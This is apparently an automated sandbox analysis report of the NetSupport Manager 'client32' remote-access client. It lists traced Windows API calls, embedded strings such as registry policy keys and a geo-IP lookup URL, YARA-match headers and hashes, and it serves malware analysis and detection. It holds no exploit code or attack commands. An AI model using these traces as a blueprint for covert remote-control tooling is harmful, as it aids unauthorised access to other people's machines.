                                                                                                • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102E368,00000000,986DAFD2,?,00000000,00000000), ref: 1102D594
                                                                                                • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102D5AA
                                                                                                • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102D5BE
                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5C5
                                                                                                • Sleep.KERNEL32(00000032), ref: 1102D5D6
                                                                                                • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5E6
                                                                                                • Sleep.KERNEL32(000003E8), ref: 1102D632
                                                                                                • CloseHandle.KERNEL32(?), ref: 1102D65F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                                                • String ID: >$IKS.LIC$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                                                • API String ID: 83693535-1096744297
                                                                                                • Opcode ID: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
                                                                                                • Instruction ID: 28ce5055a28a8f5180363266ffebbc24acbf765ee5ceddae65e6c679609cb99b
                                                                                                • Opcode Fuzzy Hash: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
                                                                                                • Instruction Fuzzy Hash: 3DB18F75E012259BEB25CF64CC84BEDB7B5BB49708F5041E9E919AB380DB70AE80CF50
                                                                                                APIs
                                                                                                  • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CBA5
                                                                                                • GetTickCount.KERNEL32 ref: 1102CBCA
                                                                                                  • Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A
                                                                                                • GetTickCount.KERNEL32 ref: 1102CCC4
                                                                                                  • Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                                  • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CDBC
                                                                                                • CloseHandle.KERNEL32(?), ref: 1102CDD8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                                • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                                • API String ID: 596640303-1725438197
                                                                                                • Opcode ID: 4b4be5afc825d4046c7b89c8e65dc4458f3d4dc60d274e6f777fc83c6e95621d
                                                                                                • Instruction ID: dd5538bcf42f02d8fc6af97e821dff418cbfa7b7de554536dce4014f8caac367
                                                                                                • Opcode Fuzzy Hash: 4b4be5afc825d4046c7b89c8e65dc4458f3d4dc60d274e6f777fc83c6e95621d
                                                                                                • Instruction Fuzzy Hash: 62817E34E0021A9BDF04DBE4CD90FEEF7B5AF55348F508259E82667284DB74BA05CBA1
                                                                                                APIs
                                                                                                • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?), ref: 1106227A
                                                                                                  • Part of subcall function 11061C60: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?), ref: 11061C9C
                                                                                                  • Part of subcall function 11061C60: RegEnumValueA.ADVAPI32 ref: 11061CF4
                                                                                                • RegEnumKeyExA.ADVAPI32 ref: 110622CB
                                                                                                • RegEnumKeyExA.ADVAPI32 ref: 11062385
                                                                                                • RegCloseKey.ADVAPI32(?), ref: 110623A1
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Enum$Open$CloseValue
                                                                                                • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                                • API String ID: 2823542970-1528906934
                                                                                                • Opcode ID: 9e66086bdcfe763fdfca1dd6d11cb513a07c5b652eaae9028f71572ee86393c5
                                                                                                • Instruction ID: 91282df486796d8d45fa06834b6704f4eef725291cd5fd64ae30f86ab301b8e1
                                                                                                • Opcode Fuzzy Hash: 9e66086bdcfe763fdfca1dd6d11cb513a07c5b652eaae9028f71572ee86393c5
                                                                                                • Instruction Fuzzy Hash: F6415E79A0022D6BD724CF51DC81FEAB7BCEF58748F1041D9EA49A6140DBB06E85CFA1
                                                                                                APIs
                                                                                                  • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                                                • GetTickCount.KERNEL32(00000000), ref: 111385E2
                                                                                                  • Part of subcall function 11096D90: CoInitialize.OLE32(00000000), ref: 11096DA4
                                                                                                  • Part of subcall function 11096D90: CLSIDFromProgID.OLE32(HNetCfg.FwMgr,?), ref: 11096DBE
                                                                                                  • Part of subcall function 11096D90: CoCreateInstance.OLE32(?,00000000,00000001,111C1B4C,?), ref: 11096DDB
                                                                                                  • Part of subcall function 11096D90: CoUninitialize.OLE32 ref: 11096DF9
                                                                                                • GetTickCount.KERNEL32 ref: 111385F1
                                                                                                • _memset.LIBCMT ref: 11138633
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11138649
                                                                                                • _strrchr.LIBCMT ref: 11138658
                                                                                                • _free.LIBCMT ref: 111386AA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                                • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                                • API String ID: 711243594-1270230032
                                                                                                • Opcode ID: 5eb3671e29344256acc8e4b42e6a6c739429c132e016e962bb157113eab44bd9
                                                                                                • Instruction ID: 5891752c4c55aadc8c036c0ba7fa863b534ef4ea4707a2085efa3f6ff011156f
                                                                                                • Opcode Fuzzy Hash: 5eb3671e29344256acc8e4b42e6a6c739429c132e016e962bb157113eab44bd9
                                                                                                • Instruction Fuzzy Hash: D8419C7AE0012E9BD710DB755C85FDAF778EB5531CF0001B9EC0997284EAB1A944CBE1
                                                                                                APIs
                                                                                                • ioctlsocket.WSOCK32 ref: 69CE7642
                                                                                                • connect.WSOCK32(00000000,?,69CEAC88), ref: 69CE7659
                                                                                                • WSAGetLastError.WSOCK32 ref: 69CE7660
                                                                                                • _memmove.LIBCMT ref: 69CE76D3
                                                                                                • select.WSOCK32(00000001,00000000,?,?,?), ref: 69CE76F3
                                                                                                • GetTickCount.KERNEL32(?,?,00001004,?,69CEAC88,00000010,00001001,?,00000004,?,00000000,00000000), ref: 69CE7717
                                                                                                • ioctlsocket.WSOCK32 ref: 69CE775C
                                                                                                • SetLastError.KERNEL32(00000000,?,69CEAC88,00000010,00001001,?,00000004,?,00000000,00000000), ref: 69CE7762
                                                                                                • WSAGetLastError.WSOCK32(?,?,00001004,?,69CEAC88,00000010,00001001,?,00000004,?,00000000,00000000), ref: 69CE777A
                                                                                                • __WSAFDIsSet.WSOCK32(00000000,?), ref: 69CE778B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
                                                                                                • String ID: *BlockingIO$ConnectTimeout$General
                                                                                                APIs
                                                                                                  • Part of subcall function 11146010: _memset.LIBCMT ref: 11146055
                                                                                                  • Part of subcall function 11146010: GetVersionExA.KERNEL32(?,00000000,00000000), ref: 1114606E
                                                                                                  • Part of subcall function 11146010: LoadLibraryA.KERNEL32(kernel32.dll), ref: 11146095
                                                                                                  • Part of subcall function 11146010: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 111460A7
                                                                                                  • Part of subcall function 11146010: FreeLibrary.KERNEL32(00000000), ref: 111460BF
                                                                                                  • Part of subcall function 11146010: GetSystemDefaultLangID.KERNEL32 ref: 111460CA
                                                                                                • AdjustWindowRectEx.USER32(11142328,00CE0000,00000001,00000001), ref: 11134DD7
                                                                                                • LoadMenuA.USER32 ref: 11134DE8
                                                                                                • GetSystemMetrics.USER32(00000021,?,110F8239,00000001,11142328,_debug), ref: 11134DF9
                                                                                                • GetSystemMetrics.USER32(0000000F,?,110F8239,00000001,11142328,_debug), ref: 11134E01
                                                                                                • GetSystemMetrics.USER32(00000004,?,110F8239,00000001,11142328,_debug), ref: 11134E07
                                                                                                • GetDC.USER32(00000000), ref: 11134E13
                                                                                                • GetDeviceCaps.GDI32(00000000,0000005A,?,110F8239,00000001,11142328,_debug), ref: 11134E1E
                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 11134E2A
                                                                                                • CreateWindowExA.USER32 ref: 11134E7F
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,110F8239,00000001,11142328,_debug), ref: 11134E87
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: System$Metrics$LibraryLoadWindow$AddressAdjustCapsCreateDefaultDeviceErrorFreeLangLastMenuProcRectReleaseVersion_memset
                                                                                                • String ID: CreateMainWnd, hwnd=%x, e=%d$NSMWClass$mainwnd ht1=%d, ht2=%d, yppi=%d
                                                                                                APIs
                                                                                                • wsprintfA.USER32 ref: 11133B70
                                                                                                • GetTickCount.KERNEL32(?), ref: 11133BA1
                                                                                                • SHGetFolderPathA.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 11133BB4
                                                                                                • GetTickCount.KERNEL32 ref: 11133BBC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountTick$FolderPathwsprintf
                                                                                                • String ID: %s%s$CommonPath$HasStudentComponents=%d$Software\NSL$Warning. SHGetFolderPath took %d ms$runplugin.exe$schplayer.exe
                                                                                                APIs
                                                                                                • _strtok.LIBCMT ref: 11027286
                                                                                                • _strtok.LIBCMT ref: 110272C0
                                                                                                • Sleep.KERNEL32(110302E7,?,*max_sessions,0000000A,00000000,?,00000002), ref: 110273B4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _strtok$Sleep
                                                                                                • String ID: *max_sessions$Client$Error. not all transports loaded (%d/%d)$LoadTransports(%d)$Protocols$Retrying...$TCPIP$UseNCS
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,69CF67B5), ref: 69CE8D6B
                                                                                                  • Part of subcall function 69CE4F70: LoadLibraryA.KERNEL32(psapi.dll), ref: 69CE4F78
                                                                                                • GetCurrentProcessId.KERNEL32 ref: 69CE8DCB
                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 69CE8DD8
                                                                                                • FreeLibrary.KERNEL32(?), ref: 69CE8EBF
                                                                                                  • Part of subcall function 69CE4FB0: GetProcAddress.KERNEL32(00000000,EnumProcessModules,00000000,?,69CE8E0D,00000000,?,00000FA0,?), ref: 69CE4FC4
                                                                                                  • Part of subcall function 69CE4FB0: K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,69CE8E0D,00000000,?,69CE8E0D,00000000,?,00000FA0,?), ref: 69CE4FE4
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 69CE8EAE
                                                                                                  • Part of subcall function 69CE5000: GetProcAddress.KERNEL32(?,GetModuleFileNameExA,00000000,?,69CE8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 69CE5014
                                                                                                  • Part of subcall function 69CE5000: K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,69CE8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 69CE5034
                                                                                                  • Part of subcall function 69CE2420: _strrchr.LIBCMT ref: 69CE242E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Process$AddressFileLibraryModuleNameProc$CloseCurrentEnumFreeHandleLoadModulesOpen_strrchr
                                                                                                • String ID: CLIENT247$NSM247$NSM247Ctl.dll$Set Is247=%d$is247$pcictl_247.dll
                                                                                                APIs
                                                                                                  • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                                  • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                                  • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                                • std::exception::exception.LIBCMT ref: 11110E4A
                                                                                                • __CxxThrowException@8.LIBCMT ref: 11110E5F
                                                                                                • GetCurrentThreadId.KERNEL32(?,000000FF,?,11031700,00000001,00000000), ref: 11110E76
                                                                                                • InitializeCriticalSection.KERNEL32(-00000010,?,11031700,00000001,00000000), ref: 11110E89
                                                                                                • InitializeCriticalSection.KERNEL32((aB,?,11031700,00000001,00000000), ref: 11110E98
                                                                                                • EnterCriticalSection.KERNEL32((aB,?,11031700), ref: 11110EAC
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,11031700), ref: 11110ED2
                                                                                                • LeaveCriticalSection.KERNEL32((aB,?,11031700), ref: 11110F5F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CriticalSection$Initialize$CreateCurrentEnterEventException@8LeaveThreadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                • String ID: (aB$..\ctl32\Refcount.cpp$QueueThreadEvent
                                                                                                • API String ID: 1976012330-3851280824
                                                                                                • Opcode ID: 284ab14b4e86901aaf973ce55c12734709027d4e5287b1af69655db2f6e8c614
                                                                                                • Instruction ID: f3d5edf841f59403b8991f5d6a5c2e10d1098d1cef77e9e1f9f0bcea7e620dca
                                                                                                • Opcode Fuzzy Hash: 284ab14b4e86901aaf973ce55c12734709027d4e5287b1af69655db2f6e8c614
                                                                                                • Instruction Fuzzy Hash: 2141AD75E00626AFDB11CFB98D80AAAFBF4FB45708F00453AF815DB248E77599048B91
                                                                                                APIs
                                                                                                  • Part of subcall function 11089560: UnhookWindowsHookEx.USER32 ref: 11089583
                                                                                                • GetCurrentThreadId.KERNEL32 ref: 111037EC
                                                                                                • GetThreadDesktop.USER32(00000000), ref: 111037F3
                                                                                                • OpenDesktopA.USER32 ref: 11103803
                                                                                                • SetThreadDesktop.USER32 ref: 11103810
                                                                                                • CloseDesktop.USER32 ref: 11103829
                                                                                                • GetLastError.KERNEL32 ref: 11103831
                                                                                                • CloseDesktop.USER32 ref: 11103847
                                                                                                • GetLastError.KERNEL32 ref: 1110384F
                                                                                                Strings
                                                                                                • SetThreadDesktop(%s) ok, xrefs: 1110381B
                                                                                                • SetThreadDesktop(%s) failed, e=%d, xrefs: 11103839
                                                                                                • OpenDesktop(%s) failed, e=%d, xrefs: 11103857
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Desktop$Thread$CloseErrorLast$CurrentHookOpenUnhookWindows
                                                                                                • String ID: OpenDesktop(%s) failed, e=%d$SetThreadDesktop(%s) failed, e=%d$SetThreadDesktop(%s) ok
                                                                                                • API String ID: 2036220054-60805735
                                                                                                • Opcode ID: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
                                                                                                • Instruction ID: e88c17566eeed1fb37d42defb77813990fcfc850afde34c4ed6f8b5b44c54373
                                                                                                • Opcode Fuzzy Hash: da88b65c0f1a222e5146661c722578c7b813502f3e62b472f9264116a955105f
                                                                                                • Instruction Fuzzy Hash: 4A112979F402196BE7047BB25C89F6FFA2C9F8561DF000038F8268A645EF24A40083B6
                                                                                                APIs
                                                                                                • GlobalAddAtomA.KERNEL32(NSMWndClass), ref: 1115F268
                                                                                                • GetLastError.KERNEL32 ref: 1115F275
                                                                                                • wsprintfA.USER32 ref: 1115F288
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                  • Part of subcall function 11029A70: _strrchr.LIBCMT ref: 11029B65
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029BA4
                                                                                                • GlobalAddAtomA.KERNEL32(NSMReflect), ref: 1115F2CC
                                                                                                • GlobalAddAtomA.KERNEL32(NSMDropTarget), ref: 1115F2D9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AtomGlobal$ErrorExitLastProcesswsprintf$Message_strrchr
                                                                                                • String ID: ..\ctl32\wndclass.cpp$GlobalAddAtom failed, e=%d$NSMDropTarget$NSMReflect$NSMWndClass$m_aProp
                                                                                                • API String ID: 1734919802-1728070458
                                                                                                • Opcode ID: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
                                                                                                • Instruction ID: 07e815115c29277e6575bd3acbfe434a71258061b731743832bfb2ada14664d5
                                                                                                • Opcode Fuzzy Hash: 402ec4c373f1d9ae321d95a7acd37e1e5b6a56151d149dbb571c93f25e459d97
                                                                                                • Instruction Fuzzy Hash: BB1127B5A4031AEBC720EFE69C80ED5F7B4FF22718B00466EE46643140EB70E544CB81
                                                                                                APIs
                                                                                                • RegQueryInfoKeyA.ADVAPI32 ref: 110613A4
                                                                                                • _malloc.LIBCMT ref: 110613EB
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
                                                                                                  • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                                                • RegEnumValueA.ADVAPI32 ref: 1106142B
                                                                                                • RegEnumValueA.ADVAPI32 ref: 11061492
                                                                                                • _free.LIBCMT ref: 110614A4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EnumValue$ErrorExitInfoLastMessageProcessQuery_free_mallocwsprintf
                                                                                                • String ID: ..\ctl32\Config.cpp$err == 0$maxname < _tsizeof (m_szSectionAndKey)$strlen (k.m_k) < _tsizeof (m_szSectionAndKey)
                                                                                                • API String ID: 999355418-161875503
                                                                                                • Opcode ID: 166b3f58753b9b284e9903ea1dd98eabc97668d01583a646d31f3d302c663443
                                                                                                • Instruction ID: 6cc8e5caf6a1957f468abfb3494a260dc46a483def11051c8948769c459486e3
                                                                                                • Opcode Fuzzy Hash: 166b3f58753b9b284e9903ea1dd98eabc97668d01583a646d31f3d302c663443
                                                                                                • Instruction Fuzzy Hash: 78A1A175A007469FE721CF64C880BABFBF8AF49304F144A5DE59697680E771F508CBA1
                                                                                                APIs
                                                                                                • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000), ref: 1115C927
                                                                                                • CoCreateInstance.OLE32(111C627C,00000000,00000017,111C61AC,?), ref: 1115C947
                                                                                                • wsprintfW.USER32 ref: 1115C967
                                                                                                • SysAllocString.OLEAUT32(?), ref: 1115C973
                                                                                                • wsprintfW.USER32 ref: 1115CA27
                                                                                                • SysFreeString.OLEAUT32(?), ref: 1115CAC8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Stringwsprintf$AllocCreateFreeInitializeInstanceSecurity
                                                                                                • String ID: SELECT * FROM %s$WQL$root\CIMV2
                                                                                                • API String ID: 3050498177-823534439
                                                                                                • Opcode ID: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
                                                                                                • Instruction ID: 91bf14772fb0e49150e0dc85e0cb347219a857647afd576183cc1e94570c565b
                                                                                                • Opcode Fuzzy Hash: 175defb0ff3311be352c3e895ec4c40801578b620f8bdfb43f719b83b34ddfee
                                                                                                • Instruction Fuzzy Hash: 04518071B40619AFC764CF69CC94F9AFBB8EB8A714F0046A9E429D7640DA30AE41CF51
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(IPHLPAPI.DLL), ref: 69D00D48
                                                                                                • GetProcAddress.KERNEL32(00000000,GetAdaptersAddresses,00000000,?,00001001,?,00000004,?,00000000,00000000), ref: 69D00D5B
                                                                                                • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,?,?,-69D2CB4C,?,00001001,?,00000004,?,00000000,00000000), ref: 69D00D76
                                                                                                • _malloc.LIBCMT ref: 69D00D8C
                                                                                                  • Part of subcall function 69D01B69: __FF_MSGBANNER.LIBCMT ref: 69D01B82
                                                                                                  • Part of subcall function 69D01B69: __NMSG_WRITE.LIBCMT ref: 69D01B89
                                                                                                  • Part of subcall function 69D01B69: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,69D0D3C1,69D06E81,00000001,69D06E81,?,69D0F447,00000018,69D27738,0000000C,69D0F4D7), ref: 69D01BAE
                                                                                                • GetAdaptersAddresses.IPHLPAPI(00000002,00000000,00000000,00000000,?,?,?,?,?,?,?,00001001,?,00000004,?,00000000), ref: 69D00D9F
                                                                                                • _free.LIBCMT ref: 69D00D84
                                                                                                  • Part of subcall function 69D01BFD: HeapFree.KERNEL32(00000000,00000000), ref: 69D01C13
                                                                                                  • Part of subcall function 69D01BFD: GetLastError.KERNEL32(00000000), ref: 69D01C25
                                                                                                • _free.LIBCMT ref: 69D00DAF
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644399148.0000000069CE1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 69CE0000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_69ce0000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: AdaptersAddressesHeap_free$AddressAllocateErrorFreeLastLibraryLoadProc_malloc
                                                                                                • String ID: GetAdaptersAddresses$IPHLPAPI.DLL
                                                                                                • API String ID: 1360380336-1843585929
                                                                                                • Opcode ID: b77510b79ad98f1f6f1f1a88f16afe645822b518228ff5d832ceab0572ec3d19
                                                                                                • Instruction ID: d3cc7657b96c787521637dd3dac41d1192f87719e061f00f3406e2518cb32729
                                                                                                • Opcode Fuzzy Hash: b77510b79ad98f1f6f1f1a88f16afe645822b518228ff5d832ceab0572ec3d19
                                                                                                • Instruction Fuzzy Hash: 08017CB5200301ABE6208F60DDA5F5777A8AB41A58F10883CFA669BA80EA71F444C774
                                                                                                APIs
                                                                                                • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,986DAFD2,11030346,00000000), ref: 11017A6E
                                                                                                • LoadLibraryA.KERNEL32(Kernel32.dll), ref: 11017A7E
                                                                                                • GetProcAddress.KERNEL32(00000000,QueueUserWorkItem), ref: 11017AC2
                                                                                                • QueueUserWorkItem.KERNEL32(110179E0,00000000,00000010), ref: 11017AD7
                                                                                                • SetLastError.KERNEL32(00000078), ref: 11017ADD
                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 11017AE8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Library$AddressCreateErrorEventFreeItemLastLoadProcQueueUserWork
                                                                                                • String ID: Kernel32.dll$QueueUserWorkItem
                                                                                                • API String ID: 3361249393-4150702566
                                                                                                • Opcode ID: 3e91b062b7345433f88135f4591795957f231578769475b4b7857bd3e6af7e82
                                                                                                • Instruction ID: 8896b3f3378cccc65e9bab94f377e18e2855128faf3beda00f5a87bac3949b10
                                                                                                • Opcode Fuzzy Hash: 3e91b062b7345433f88135f4591795957f231578769475b4b7857bd3e6af7e82
                                                                                                • Instruction Fuzzy Hash: 0121D3B1D52638ABDB10CFDAD984ADEFFB8EB49B10F10451BF421E7644C7B445008B91
                                                                                                APIs
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 1101016D
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 11010190
                                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 11010214
                                                                                                • __CxxThrowException@8.LIBCMT ref: 11010222
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 11010235
                                                                                                • std::locale::facet::_Facet_Register.LIBCPMT ref: 1101024F
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.644285936.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
                                                                                                • String ID: bad cast
                                                                                                • API String ID: 2427920155-3145022300
                                                                                                • Opcode ID: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
                                                                                                • Instruction ID: 8605f433ca934ff223fddf63d9ff4cd14790153354e7e9eb7327a23900883db8
                                                                                                • Opcode Fuzzy Hash: 0888c3559ae941ddfd3a65509c7b8561ae704fbfc828ce88d4b35523d1ba3580
                                                                                                • Instruction Fuzzy Hash: 5631F975E00256DFCB05DFA4C880BDEF7B8FB05328F440169D866AB288DB79E904CB91
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,11195AD8), ref: 1114580D
                                                                                                • SHGetFolderPathA.SHFOLDER(00000000,00000026,00000000,00000000,?), ref: 1114584E
                                                                                                • SHGetFolderPathA.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 111458AB
                                                                                                  • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                                  • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                                  • Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
